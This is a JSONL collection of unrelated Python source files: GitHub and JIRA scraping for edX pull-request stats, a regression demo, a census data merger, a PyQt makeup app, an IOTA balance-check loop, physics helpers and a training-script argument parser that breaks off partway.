+{"seq_id":"622521779","text":"from github3 import GitHub, login\nfrom jira import JIRA\nimport base64, yaml, json\n\nfrom django.db.models import When, Q\nfrom django.core.exceptions import ObjectDoesNotExist, MultipleObjectsReturned\n\nfrom mysite.settings import BASE_DIR\nfrom osprdata.models import Pull, OSPRUser, OSPRGroup, Ticket\nfrom osprdata.secrets import ghpassword, jirapassword\n\ng = login(\"shaunagm\", password=ghpassword)\n\nj = JIRA(basic_auth=('oscm+opsr-stats-bot@edx.org', jirapassword),\n options={'server': 'https://openedx.atlassian.net/'})\n\n\n# Helper functions\ndef get_or_create_user(user_dict):\n\n name = user_dict['name'] if user_dict.get('name') else None\n github_username = user_dict['github_username'] if user_dict.get('github_username') else None\n jira_username = user_dict['jira_username'] if user_dict.get('jira_username') else None\n\n try:\n user = OSPRUser.objects.get(\n (Q(name=name) & Q(name__isnull=False)) |\n (Q(github_username=github_username) & Q(github_username__isnull=False)) |\n (Q(jira_username=jira_username) & Q(jira_username__isnull=False))\n )\n user.add_if_empty(name=name, github_username=github_username, jira_username=jira_username)\n except MultipleObjectsReturned:\n print(\"Duplicate user in DB: \", user_dict)\n return False\n except ObjectDoesNotExist:\n user = OSPRUser.objects.create(name=name, github_username=github_username, jira_username=jira_username)\n print(\"Creating user: \", user)\n return user\n\ndef update_membership(new_data, database_object, remove_extra=True):\n\n for person in new_data:\n user = get_or_create_user(person)\n if user in database_object.members.all():\n continue\n else:\n database_object.members.add(user)\n print(user, \" added\")\n\n if remove_extra:\n for person in database_object.members.all():\n pass\n # Need better way to check if not in database, maybe refactor get or create user\n # if person.name not in [user['name'] for user in new_data]:\n # database_object.members.remove(user)\n else:\n print(\"Skip removal of extra/missing users from database\")\n\n# Scrape new PRs from Github\n\ndef update_and_save_pull(pull_object, pull, created, g, repo, issue=None):\n if created:\n pull_object.title = pull.title\n pull_object.number = pull.number\n pull_object.date_created = pull.created_at\n pull_object.repo = repo.name\n pull_object.save()\n pull_object.update_status_and_dates(pull)\n if issue is None:\n issue = g.issue('edx', repo.name, pull.number) # Switch to issue due to limited Pull API\n pull_object.update_closer(issue)\n pull_object.is_ospr(issue)\n update_membership([{'github_username': comment.user} for comment in issue.iter_comments()], pull_object, remove_extra=False)\n\ndef get_new_prs_from_github_repo(g, repo, ospr_only):\n if ospr_only:\n pulls = repo.iter_issues(state=\"all\", labels='open-source-contribution', sort=\"updated\")\n else:\n pulls = repo.iter_pulls(state=\"all\", sort=\"updated\", direction=\"desc\")\n for pull in pulls:\n issue = pull if ospr_only else None\n if ospr_only:\n pull = repo.pull_request(pull.pull_request['html_url'].rsplit('/', 1)[-1])\n pull_object, created = Pull.objects.get_or_create(url=pull.html_url)\n print(\"Pull: \", pull.number)\n # if not created and pull_object.date_updated == pull.updated_at:\n # continue # When done with backlog switch this to \"break\"\n update_and_save_pull(pull_object, pull, created, g, repo, issue)\n\ndef get_prs_from_github(g, repo_name=None, ospr_only=False):\n if repo_name is None:\n edx = g.organization('edx')\n for repo in edx.iter_repos():\n print(\"Repo: \", repo.name)\n get_new_prs_from_github_repo(g, repo, ospr_only)\n else:\n print(\"Repo: \", repo_name)\n repo = g.repository('edx', repo_name)\n get_new_prs_from_github_repo(g, repo, ospr_only)\n\n\n# Scrape new tickets from JIRA\n\ndef update_and_save_ticket(ticket_object, ticket, created, g):\n if created:\n ticket_object.title = ticket.fields.summary\n ticket_object.number = ticket.key.split(\"-\")[1] # Get the OSPR-specific number\n ticket_object.date_created = ticket.fields.created\n ticket_object.project = ticket.fields.project\n ticket_object.ospr = True\n ticket_object.save()\n if ticket.fields.assignee:\n user, created = OSPRUser.objects.get_or_create(name=ticket.fields.assignee)\n ticket_object.assignee.add(user)\n if ticket.fields.resolution is not None:\n ticket_object.date_closed = ticket.fields.resolutiondate\n # NOTE: The easiest way to get the closed by info is to generate a custom field\n # in JIRA and reference that.\n ticket_object.update_status_and_dates(ticket)\n linked_pull = Pull.objects.filter(url=ticket.fields.customfield_10904).first()\n if linked_pull is not None:\n ticket_object.linked_pulls.add(linked_pull)\n print(\"linked ticket & pull: \", ticket_object, linked_pull)\n ticket_object.update_labels(ticket)\n\ndef get_new_tickets_from_JIRA(j):\n tickets = j.search_issues('project=ospr', maxResults=300)\n # Temporary - delete once backlog is retrieved\n # WAIT - this is not order updated, it's order created -- can we switch?\n next_tickets = j.search_issues('project=ospr', maxResults=1000, startAt=300)\n tickets += next_tickets\n for ticket in tickets:\n # NOTE: The URL below is wrong, it goes to the API url not the HTML url\n ticket_object, created = Ticket.objects.get_or_create(url=ticket._get_url(ticket.id))\n print(\"Ticket: \", ticket.key)\n if not created and ticket_object.date_updated == ticket.fields.updated:\n break\n update_and_save_ticket(ticket_object, ticket, created, j)\n\n# Update group membership\n\ndef update_internal_teams_and_users():\n # Uses the repo's json file and calls to JIRA and Github to create/update internal teams and users\n with open(BASE_DIR + '/osprdata/internal_team_info.yaml') as data_file:\n data = yaml.load(data_file)\n for team, team_dict in data.items():\n print(\"Team: \", team)\n group, created = OSPRGroup.objects.get_or_create(group_type=\"int\", name=team)\n group.superteam = team_dict['superteam']\n group.save()\n if team_dict['labels'] != []:\n group.set_labels(team_dict['labels'])\n if team_dict['repos'] != []:\n group.set_repos(team_dict['repos'])\n member_dict = [{'name': member_name} for member_name in team_dict['members']]\n print(\"members of team: \", member_dict)\n update_membership(member_dict, group, remove_extra=False)\n\ndef update_external_teams_and_users(g):\n # Uses people.yaml to create/update external teams and users.\n repo = g.repository(\"edx\", \"repo-tools-data\")\n people_data = repo.contents(\"people.yaml\")\n decoded_data = base64.b64decode(people_data.content).decode('utf-8')\n people = yaml.load(decoded_data)\n for username, userdata in people.items():\n jira_username = userdata['jira'] if userdata.get('jira') else None\n user = get_or_create_user({'name': userdata['name'], 'github_username': username, 'jira_username': jira_username})\n ### Standardize people.yaml, reuse repo-tools-data tools?\n if userdata['agreement'] is None: # This is missing some other ways people are labelled inactive.\n user.active = False\n user.save()\n if userdata.get('institution'):\n if userdata['institution'] == \"edX\":\n group, created = OSPRGroup.objects.get_or_create(group_type=\"msc\", name=\"edX yaml group\")\n else:\n group, created = OSPRGroup.objects.get_or_create(group_type=\"ext\", name=userdata['institution'])\n if created:\n if group.name in ['Arbisoft', 'BNOTIONS', 'Clarice', 'ExtensionEngine', 'OpenCraft']:\n group.is_contractor = True\n if userdata['agreement'] == \"institution\":\n group.is_institution_CLA = True\n if userdata['institution'] not in user.groups.all():\n group.members.add(user)\n group.save()\n else:\n group, created = OSPRGroup.objects.get_or_create(group_type=\"msc\", name=\"Miscellaneous Individuals\")\n group.members.add(user)\n\ndef update_github_org_membership(g):\n # Checks membership in EdX github org\n edx = g.organization('edx')\n members_on_github = [{'github_username': member.login} for member in edx.iter_members()]\n edx_db_group, created = OSPRGroup.objects.get_or_create(group_type=\"msc\", name=\"EdX Github Organization\")\n update_membership(members_on_github, edx_db_group, remove_extra=False)\n\ndef update_users_and_members(g):\n update_internal_teams_and_users()\n update_external_teams_and_users(g)\n update_github_org_membership(g)\n\n\n# Gets older data. Catches Github API timeout and waits. Uses Etags to determine what's been gotten.\ndef get_old_data(g, j):\n pass\n","sub_path":"ospr-site/osprdata/api_calls.py","file_name":"api_calls.py","file_ext":"py","file_size_in_byte":9185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"415995221","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 5 17:09:56 2020\nImplement linear regression with scikit learn\n@author: cindy\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.linear_model import LinearRegression\n\nrng = np.random.RandomState(1)\nx = 10 * rng.rand(50)\ny = 2 * x - 5 + rng.randn(50)\n#plt.scatter(x,y)\nmodels = LinearRegression(fit_intercept=True)\n# Add dimension of the x array to 2d (scikit learn needs data in 2d)\nnew_x = x[:,np.newaxis] \nmodel = models.fit(new_x,y)\nprint(model.coef_[0]) # slope\nprint(model.intercept_) # y intercept\nxfit = np.linspace(0,10,1000)\nyfit = model.predict(xfit[:,np.newaxis])\nplt.scatter(x,y,alpha=0.3)\nplt.plot(xfit,yfit,'r')\n","sub_path":"Regression/linear_regression_2.py","file_name":"linear_regression_2.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"444286311","text":"# 2. Celsius to Fahrenheit conversion\n# The formula to convert a temperature from Celsius to Fahrenheit is:\n\n# F = (C * 9/5) + 32\n\n# Write a function that takes a temperature in Celsius, converts it Fahrenheit, and returns the value.\n\ndef celsius_conversion():\n temperature = int(input(\"Enter a temperature in Celsius: \"))\n F = (temperature * 9/5) + 32\n return F\n\nprint(celsius_conversion())","sub_path":"02-week/2-wednesday/labs/j-ckie/02_celsius_to_fahrenheit.py","file_name":"02_celsius_to_fahrenheit.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"430708744","text":"from models import AllowedReferrer\n\nclass CORSMiddleware(object):\n def process_response(self, request, response):\n if 'key' in request.GET:\n referrers = AllowedReferrer.objects.filter(\n project__api_key=request.GET.get('key'))\\\n .values_list('url', flat=True)\n if referrers:\n response['Access-Control-Allow-Origin'] = ','.join(referrers)\n return response\n","sub_path":"server/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"59157914","text":"import numpy as np\nimport pandas as pd\nimport json\nfrom pprint import pprint\n\nwith open('data/gz_2010_36_140_00_500k.json') as f:\n tracts=json.load(f)\n\ndef load_df(file_path):\n df = pd.read_json(file_path)\n df.columns = df.iloc[0] ## first row as column names\n df = df.drop(df.index[0]) ## drop column name row\n return df\n\nhousing = load_df('data/housing/censusHousing.json')\npoverty_race = load_df('data/povertyrace/censusPovertyRace.json')\n\n### ADD MEDIAN HOME VALUE FOR OWNED HOME ###\n# https://www.census.gov/quickfacts/fact/note/US/HSG445217\nhousing['median_homevalue'] = pd.to_numeric(housing['DP04_0089E']) ## Estimate!!HOUSING TENURE!!Occupied housing units!!Owner-occupied\nhousing.loc[housing['median_homevalue']<0,'median_homevalue'] = None\n\n### ADD % HOMEOWNERSHIP COLUMN ###\n# The homeownership rate is computed by dividing the number of owner-occupied housing units by the number of occupied housing units or households\n# https://www.census.gov/quickfacts/fact/note/US/HSG445217\nhousing['DP04_0046E'] = pd.to_numeric(housing['DP04_0046E']) ## Estimate!!HOUSING TENURE!!Occupied housing units!!Owner-occupied\nhousing['DP04_0002E'] = pd.to_numeric(housing['DP04_0002E']) ## Estimate!!HOUSING OCCUPANCY!!Total housing units!!Occupied housing units\nhousing['pct_homeownership'] = housing['DP04_0046E'] / housing['DP04_0002E']\n\n### ADD % POVERTY COLUMN ###\npoverty_race['pct_poverty'] = pd.to_numeric(poverty_race['DP03_0119PE'])\npoverty_race.loc[poverty_race['pct_poverty']<0,'pct_poverty'] = None\npoverty_race['pct_poverty'] = poverty_race['pct_poverty']/100\n\n### ADD % NON-WHITE COLUMN ###\npoverty_race['pct_nonwhite'] = pd.to_numeric(poverty_race['DP05_0037PE'])\npoverty_race.loc[poverty_race['pct_nonwhite']<0,'pct_nonwhite'] = None\npoverty_race['pct_nonwhite'] = poverty_race['pct_nonwhite']/100\npoverty_race['pct_nonwhite'] = 1-poverty_race['pct_nonwhite']\n\n## ADD MORTGAGE % COLUMN ###\nhousing['pct_mortgage'] = pd.to_numeric(housing['DP04_0091PE'])\nhousing.loc[housing['pct_mortgage']<0,'pct_mortgage'] = None\nhousing['pct_mortgage'] = housing['pct_mortgage']/100\n\nhomeownership = housing[['NAME','GEO_ID','state','county','tract','pct_homeownership','DP04_0002E','DP04_0046E','median_homevalue','DP04_0089E','pct_mortgage','DP04_0091PE']]\n\n### ADD COLUMNS TO GEOJSON FILE ###\nnew_features = []\n\nfor tract in tracts['features']:\n homeownership_tract = homeownership[(homeownership['tract']==tract['properties']['TRACT']) & (homeownership['county']==tract['properties']['COUNTY'])]\n if len(homeownership_tract) == 1:\n if ~np.isnan(homeownership_tract.iloc[0]['pct_homeownership']):\n tract['properties']['pctHomeownership'] = homeownership_tract.iloc[0]['pct_homeownership']\n if ~np.isnan(homeownership_tract.iloc[0]['median_homevalue']):\n tract['properties']['medianHomevalue'] = homeownership_tract.iloc[0]['median_homevalue']\n if ~np.isnan(homeownership_tract.iloc[0]['pct_mortgage']):\n tract['properties']['pctMortgage'] = homeownership_tract.iloc[0]['pct_mortgage']\n povertyrace_tract = poverty_race[(poverty_race['tract']==tract['properties']['TRACT']) & (poverty_race['county']==tract['properties']['COUNTY'])]\n if len(povertyrace_tract) == 1:\n if ~np.isnan(povertyrace_tract.iloc[0]['pct_poverty']):\n tract['properties']['pctPoverty'] = povertyrace_tract.iloc[0]['pct_poverty']\n if ~np.isnan(povertyrace_tract.iloc[0]['pct_nonwhite']):\n tract['properties']['pctNonwhite'] = povertyrace_tract.iloc[0]['pct_nonwhite']\n\n if ((len(povertyrace_tract) == 1) | (len(homeownership_tract) == 1)):\n new_features.append(tract)\n\n\nnew_tracts = {\"type\":\"FeatureCollection\",\"features\":new_features}\n# pprint(type(new_tracts))\nwith open('data/allCensus.json','w') as f:\n json.dump(new_tracts,f)\n","sub_path":"quant/all-census-columns.py","file_name":"all-census-columns.py","file_ext":"py","file_size_in_byte":3832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"43027616","text":"\"\"\"djangoreactproject URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\n\nfrom django.contrib import admin\nfrom django.urls import path, include\n\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('users/', include('Usuarios_k.urls')),\n path('categorias/', include('Categorias_k.urls')),\n path('cursos/', include('Curso_k.urls')),\n path('inscripciones/', include('Inscribe_k.urls')),\n path('eventos/', include('Evento_k.urls')),\n path('logros/', include('Logros_k.urls')),\n path('cupones/', include('Cupon_k.urls')),\n path('tutores/', include('Sigue_k.urls')),\n path('experiencia/', include('Experiencia_k.urls')),\n path('realiza/', include('Realiza_k.urls')),\n path('califica/', include('Califica_k.urls')),\n path('selecciona/', include('Selecciona_k.urls')),\n path('gana/', include('Gana_k.urls')),\n path('foros/', include('Foro_k.urls'))\n \n\n]\n","sub_path":"knowtured/knowtured/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"259339574","text":"import sys\n\nfrom PyQt5.QtWidgets import (\n QApplication, QDialog, QMainWindow, QMessageBox\n)\n\nimport PyQt5\nfrom PyQt5 import QtCore, QtGui, QtWidgets, uic\nfrom PyQt5.QtWidgets import QFileDialog, QPlainTextEdit\nfrom PyQt5.QtGui import QPixmap\nimport os\n\nfrom UI_Maker_Face import Ui_MainWindow\nimport cv2\nimport makeup\n\nclass Window(QMainWindow, Ui_MainWindow):\n def __init__(self, parent=None):\n super().__init__(parent)\n self.setupUi(self)\n\n self.pushButton_3.clicked.connect(self.show_image_orig)\n self.pushButton.clicked.connect(self.run)\n self.pushButton_5.clicked.connect(self.show_image_targ)\n self.pushButton_2.clicked.connect(self.save_file)\n self.pushButton_4.clicked.connect(self.exit)\n self.arr_orig = []\n self.arr_targ = []\n self.arr_img = []\n\n\n def exit(self):\n sys.exit()\n\n def save_file(self):\n fileName = QFileDialog.getSaveFileName(self, str(\"Save File\"), \"C:/Users/ASUS/OneDrive - Trường ĐH CNTT - University of Information Technology/Máy tính/ComputerVision/Final_Project/final_project_of_Computer_Vision/Final_Image/untitled.jpg\", str(\"Images (*.png *.xpm *.jpg)\"))\n fileName = fileName[0]\n if fileName != None:\n fileName = list(fileName.split('/'))\n fileName = str(fileName[len(fileName) - 2]) + '/' + str(fileName[len(fileName)-1])\n img = self.arr_img[len(self.arr_img) - 1]\n cv2.imwrite(fileName, img)\n\n\n def run(self):\n self.read_import()\n\n def read_import(self):\n url_orig = self.arr_orig[len(self.arr_orig)-1]\n url_orig = list(url_orig.split('/'))\n url_orig = str(url_orig[len(url_orig)-2]) + '/' + str(url_orig[len(url_orig)-1])\n\n url_targ = self.arr_targ[len(self.arr_targ) - 1]\n url_targ = list(url_targ.split('/'))\n url_targ = str(url_targ[len(url_targ) - 2]) + '/' + str(url_targ[len(url_targ) - 1])\n\n img = makeup.makeup_main(url_orig, url_targ)\n\n img = self.crop_img(img)\n\n if len(self.arr_img) != 0:\n self.arr_img.pop(0)\n self.arr_img.append(img)\n\n scene = QtWidgets.QGraphicsScene(self.graphicsView_2)\n pixmap = self.convert_cv_qt(img)\n item = QtWidgets.QGraphicsPixmapItem(pixmap)\n scene.addItem(item)\n self.graphicsView_2.setScene(scene)\n\n def crop_img(self, img):\n w, h = img.shape[:2]\n for i in range(0, h - 1)[::-1]:\n if img[i][0][0] > 10:\n img = img[0:i, :]\n break\n return img\n\n def convert_cv_qt(self, cv_img):\n \"\"\"Convert from an opencv image to QPixmap\"\"\"\n rgb_image = cv2.cvtColor(cv_img, cv2.COLOR_BGR2RGB)\n h, w, ch = rgb_image.shape\n bytes_per_line = ch * w\n convert_to_Qt_format = PyQt5.QtGui.QImage(rgb_image.data, w, h, bytes_per_line, QtGui.QImage.Format_RGB888)\n p = convert_to_Qt_format.scaledToHeight(570)\n #p = convert_to_Qt_format\n return QPixmap.fromImage(p)\n\n\n # def pushButton_3_handler(self):\n # print('Button pressed')\n # self.open_dialog_box()\n\n # Mo hop thoai chon file local\n def open_dialog_box_orig(self):\n filename = QFileDialog.getOpenFileName(self, str(\"Open File\"), \"C:/Users/ASUS/OneDrive - Trường ĐH CNTT - University of Information Technology/Máy tính/ComputerVision/Final_Project/final_project_of_Computer_Vision/Original_Image\", str(\"Images (*.png *.xpm *.jpg)\"))\n path = filename[0]\n if len(self.arr_orig) != 0:\n self.arr_orig.pop(0)\n self.arr_orig.append(path)\n return path\n\n def open_dialog_box_targ(self):\n filename = QFileDialog.getOpenFileName(self, str(\"Open File\"), \"C:/Users/ASUS/OneDrive - Trường ĐH CNTT - University of Information Technology/Máy tính/ComputerVision/Final_Project/final_project_of_Computer_Vision/Target_Image\", str(\"Images (*.png *.xpm *.jpg)\"))\n path = filename[0]\n if len(self.arr_targ) != 0:\n self.arr_targ.pop(0)\n self.arr_targ.append(path)\n return path\n\n\n def show_image_orig(self):\n image_path = self.open_dialog_box_orig()\n if os.path.isfile(image_path):\n scene = QtWidgets.QGraphicsScene(self.graphicsView)\n pixmap = QPixmap(image_path).scaledToHeight(570)\n item = QtWidgets.QGraphicsPixmapItem(pixmap)\n scene.addItem(item)\n self.graphicsView.setScene(scene)\n\n def show_image_targ(self):\n image_path = self.open_dialog_box_targ()\n if os.path.isfile(image_path):\n scene = QtWidgets.QGraphicsScene(self.graphicsView_3)\n pixmap = QPixmap(image_path).scaledToHeight(570)\n item = QtWidgets.QGraphicsPixmapItem(pixmap)\n scene.addItem(item)\n self.graphicsView_3.setScene(scene)\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n win = Window()\n win.show()\n sys.exit(app.exec())","sub_path":"Source_code/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"471970337","text":"__author__ = 'Ankur Anand'\n\nbalance\nannualInterestRate\nmonthlyPaymentRate\ntotalAmountPaid = 0.0\nmonthlyInteresRate = annualInterestRate / 12.0\npreviousBalance = balance\nMinimumMonthlyPayment = 0.0\nMonthlyUnpaidBalance = 0.0\nfor i in range(1,13):\n\tprint (\"Month: \" + str(i))\n\tMinimumMonthlyPayment = monthlyPaymentRate * previousBalance\n\ttotalAmountPaid += MinimumMonthlyPayment\n\tprint(\"Minimum monthly payment: \" + \"%.2f\" % round(MinimumMonthlyPayment, 2))\n\tMonthlyUnpaidBalance = previousBalance - MinimumMonthlyPayment\n\tpreviousBalance = MonthlyUnpaidBalance + (monthlyInteresRate * MonthlyUnpaidBalance)\n\tprint(\"Remaining balance: \" + \"%.2f\" % round(previousBalance, 2))\nprint(\"Total paid: \" + \"%.2f\" % round(totalAmountPaid, 2))\nprint(\"Remaining balance: \" + \"%.2f\" % round(previousBalance, 2))","sub_path":"Pset2Q1.py","file_name":"Pset2Q1.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"512133670","text":"\r\n#-------------------------------------------------------------------------------#\r\n#-- PROJECT Smart Ride #\r\n# #\r\n#-- PROGRAM GOALS #\r\n#-- Implement IOTA to Transportation paradigm #\r\n# #\r\n#-- Programmers: Cris Thomas, Jiss Joseph Thomas #\r\n#-- References: IOTA #\r\n#-------------------------------------------------------------------------------#\r\n\r\nfrom iota import Iota\r\nfrom iota import Address\r\nimport time\r\nimport datetime\r\n# import RPi.GPIO as gpio\r\n\r\n# # Set RPi GPIO\r\n# gpio.setmode(gpio.BCM)\r\n# gpio.setup(40, gpio.OUT)\r\n# gpio.setup(38, gpio.OUT)\r\n# gpio.setup(36, gpio.OUT)\r\n# gpio.setup(32, gpio.OUT)\r\n\r\n# # Relay interfacings\r\n# relay_1_pin = 40\r\n# relay_2_pin = 38\r\n# relay_3_pin = 36\r\n# relay_4_pin = 32\r\n\r\n# # Function to check balance on the IOTA tangle. \r\n# def balance_check():\r\n\r\n# \tprint(\"Checking balance\")\r\n# \tbalance_result = iota_obj.get_balances(address)\r\n# \tbalance = balance_result['balances']\r\n# \treturn (balance[0])\r\n\r\n# # IOTA fullnode URL\r\n# iotaNode = \"https:#nodes.thetangle.org:443\"\r\n\r\n# # Creating an IOTA object\r\n# iota_obj = Iota(iotaNode, \"\")\r\n\r\n# # IOTA address\r\n# # Create your own address using Trinity Wallet\r\n# address = [Address(b'DESCRIBEYOURADDRESSHERE')]\r\n\r\n# # Obtain the current balance \r\n# currentbalance = balance_check()\r\n# prev_balance = currentbalance\r\n\r\n# Variables\r\nbalance = 0\r\nbalcheckcount = 0\r\nact_status = False\r\n\r\n# Main loop\r\nwhile True:\r\n\t\r\n\t# Check for balance every 5 seconds.\r\n\tif balcheckcount == 5:\r\n\t\tprint(\"Checking balance for address \", address)\r\n\t\t# currentbalance = balance_check()\r\n\t\tif currentbalance > prev_balance:\r\n\t\t\tbalance = balance + (currentbalance - prev_balance)\r\n\t\t\tprev_balance = currentbalance\r\n\t\tbalcheckcount = 0\r\n\r\n\t# Manage the activation status\r\n\tif balance > 0:\r\n\t\tif act_status == False:\r\n\t\t\tprint(\"Balance Received.... Activating.....\")\r\n\t\t\tact_status=True\r\n\t\tbalance = balance -1 \r\n\telse:\r\n\t\tif act_status == True:\r\n\t\t\tact_status=False\r\n\r\n\t# Interaction based in activation status\r\n\tif act_status == True:\r\n\t\t# gpio.output(40, gpio.HIGH)\r\n\t\t# gpio.output(38, gpio.HIGH)\r\n\t\t# gpio.output(36, gpio.HIGH)\r\n\t\t# gpio.output(32, gpio.HIGH)\r\n\r\n\t\ttime.sleep(5)\r\n\r\n\t\t# gpio.output(40, gpio.LOW)\r\n\t\t# gpio.output(38, gpio.LOW)\r\n\t\t# gpio.output(36, gpio.LOW)\r\n\t\t# gpio.output(32, gpio.LOW)\r\n \r\n\t\t# Print action\r\n\t\tprint(\"Action completed\")\r\n\r\n\t# Increase counter\r\n\tbalcheckcount = balcheckcount +1\r\n\r\n\t# Pause 1 sec.\r\n\ttime.sleep(1)\r\n","sub_path":"Project_Smart Ride_IOTA.py","file_name":"Project_Smart Ride_IOTA.py","file_ext":"py","file_size_in_byte":2830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"278005023","text":"import math\nimport numpy as np\nimport numpy.linalg as linalg\nimport math\n\ndef Trans_matrix(phi, *args): \n\tt1,t2,t3 = args\n\treturn np.array( [(t1, 1/np.sqrt(3)*t2*np.exp(-2j*phi),\\\n\t\t\t\t\t\t\t\t\t np.sqrt(2./3)*t2*np.exp(-2j*phi)),\\\n\t\t\t\t\t\t(1/np.sqrt(3)*t2*np.exp(2j*phi), 1./3*(t1+2*t3), np.sqrt(2)/3*(t1-t3)),\\\n\t\t\t\t\t\t(np.sqrt(2./3)*t2*np.exp(2j*phi),np.sqrt(2)/3*(t1-t3), 1./3*(2*t1+t3))] )\n\ndef energies(ham_2d, args, NX = 40, NY = 40):\n \"\"\"Returns the array of energies associated with each of the wave vector from the\n 2D Brillouin zone. The hamiltonian must be of form ham(px,py,*args)\"\"\" \n energies = []\n pxrange = np.linspace(-math.pi,math.pi, NX)\n pyrange = np.linspace(-math.pi,math.pi, NY)\n \n for px in pxrange:\n \tenergies.append([])\n \tfor py in pyrange:\n \t\tenergies[-1].append(linalg.eigvalsh(ham_2d(px,py,*args)))\n \n pxgrid, pygrid = np.meshgrid(pxrange,pyrange,indexing = 'ij')\n \t\t\t\t\t\t\n energies = np.array(energies).transpose(2,0,1)\n return pxgrid, pygrid, energies\n\ndef stripe_energies(stripe_ham, args, NX = 60, plim = (0,2*math.pi)):\n energies = []\n pyrange = np.linspace(plim[0],plim[1], NX)\n \n for py in pyrange:\n \tenergies.append(linalg.eigvalsh(stripe_ham(py,*args)))\n \t\t\t\t\t\t\n energies = np.array(energies).transpose()\n return pyrange, energies\n\ndef slice_of_energies(ham, px, args, NX = 60):\n energies = []\n pyrange = np.linspace(0,2*math.pi, NX)\n \n for py in pyrange:\n \tenergies.append(linalg.eigvalsh(ham(px, py,*args)))\n \t\t\t\t\t\t\n energies = np.array(energies).transpose()\n return pyrange, energies\n","sub_path":"science/spin_orbit/tb_model/tblib.py","file_name":"tblib.py","file_ext":"py","file_size_in_byte":1609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"391230512","text":"\"\"\" enumeration of systematics for easy looping \"\"\"\n\njet_syst_list = []\nmuon_syst_list = []\n\njet_pt_systs = {\"jet_pt\":\"pt\",\n \"jet_pt_jes_up\":\"pt_jes_up\",\"jet_pt_jes_down\":\"pt_jes_down\",\n \"jet_pt_jer_up\":\"pt_jer_up\",\"jet_pt_jer_down\":\"pt_jer_down\"}\n\njet_weight_systs = {\"jetweight\":\"weight\",\n \"jetweight_pu_up\":\"weight_pu_up\",\n \"jetweight_pu_down\":\"weight_pu_down\",\n \"jetweight_trigger_up\":\"weight_trigger_up\",\n \"jetweight_trigger_down\":\"weight_trigger_down\"}\n\nmuon_weight_systs = {\"muweight\":\"weight\",\n \"muweight_trigger_up\":\"weight_trigger_up\",\n \"muweight_trigger_down\":\"weight_trigger_down\",\n \"muweight_id_up\":\"weight_id_up\" ,\"muweight_id_down\":\"weight_id_down\",\n \"muweight_iso_up\":\"weight_iso_up\" ,\"muweight_iso_down\":\"weight_iso_down\",\n \"muweight_pu_up\":\"weight_pu_up\" ,\"muweight_pu_down\":\"weight_pu_down\"}\n","sub_path":"dazsle_hbb_recipes/plots/systematics.py","file_name":"systematics.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"446883388","text":"#!/usr/bin/env python\nimport torch\nimport pdb\nimport numpy as np\nfrom torch.autograd import Variable\nimport os\nimport argparse\nimport datasets\nimport models\nimport pickle\nimport time\nimport monitoring\n#\ndef build_parser():\n parser = argparse.ArgumentParser(description=\"\")\n\n ### Hyperparameter options\n parser.add_argument('--epoch', default=10, type=int, help='The number of epochs we want ot train the network.')\n parser.add_argument('--seed', default=260389, type=int, help='Seed for random initialization and stuff.')\n parser.add_argument('--batch-size', default=10000, type=int, help=\"The batch size.\")\n parser.add_argument('--lr', default=1e-3, type=float, help='learning rate')\n parser.add_argument('--momentum', default=0.9, type=float, help='momentum')\n \n\n ### Dataset specific options\n parser.add_argument('--data-dir', default='./data/', help='The folder contaning the dataset.')\n parser.add_argument('--data-file', default='.', help='The data file with the dataset.')\n parser.add_argument('--dataset', choices=['gene', 'domaingene', 'impute', 'fedomains', 'doubleoutput'], default='gene', help='Which dataset to use.')\n parser.add_argument('--mask', type=int, default=0, help=\"percentage of masked values\")\n parser.add_argument('--missing', type=int, default=0, help=\"number of held out combinations for FE domains\")\n parser.add_argument('--data-domain', default='.', help='Number of domains in the data for triple factemb')\n parser.add_argument('--transform', default=True,help='log10(exp+1)')\n \n # Model specific options\n parser.add_argument('--layers-size', default=[250, 75, 50, 25, 10], type=int, nargs='+', help='Number of layers to use.')\n parser.add_argument('--emb_size', default=2, type=int, help='The size of the embeddings.')\n parser.add_argument('--set-gene-emb', default='.', help='Starting points for gene embeddings.')\n parser.add_argument('--warm_pca', default='.', help='Datafile to use as a PCA warm start for the sample embeddings')\n\n parser.add_argument('--weight-decay', default=1e-5, type=float, help='The size of the embeddings.')\n parser.add_argument('--model', choices=['factor', 'triple', 'multiple','doubleoutput', 'choybenchmark'], default='factor', help='Which model to use.')\n parser.add_argument('--cpu', action='store_true', help='If we want to run on cpu.') # TODO: should probably be cpu instead.\n parser.add_argument('--name', type=str, default=None, help=\"If 